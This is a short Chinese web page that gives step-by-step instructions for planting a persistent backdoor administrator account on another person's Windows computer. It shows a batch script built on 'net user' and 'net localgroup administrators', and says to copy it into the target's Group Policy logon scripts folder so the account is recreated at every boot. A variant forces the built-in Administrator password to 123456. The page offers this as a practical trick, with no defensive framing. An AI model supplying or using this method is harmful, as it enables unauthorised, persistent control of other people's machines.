首页 汽车资讯 时尚资讯 读书心得 大数据 灯饰资讯 农业信息 房产资讯 化工资讯 育儿资讯 科技资讯 戏剧歌舞 趣闻趣事 更多
首页 » 电脑资讯» 内容正文

建立系统中别人永远删不掉的管理员用户

发布时间:2021-09-21 13:20:02

操作步骤:

1、在自己电脑里面建立一个.txt文本文件.

2、在里面输入内容

@echo off net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码; net localgroup administrators xixi /add

3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;

4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

如果把里面的内容改成

@echo off net user administrator 123456 /add

意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。


锦州二手房 https://c21.com.cn/
怜怜信息网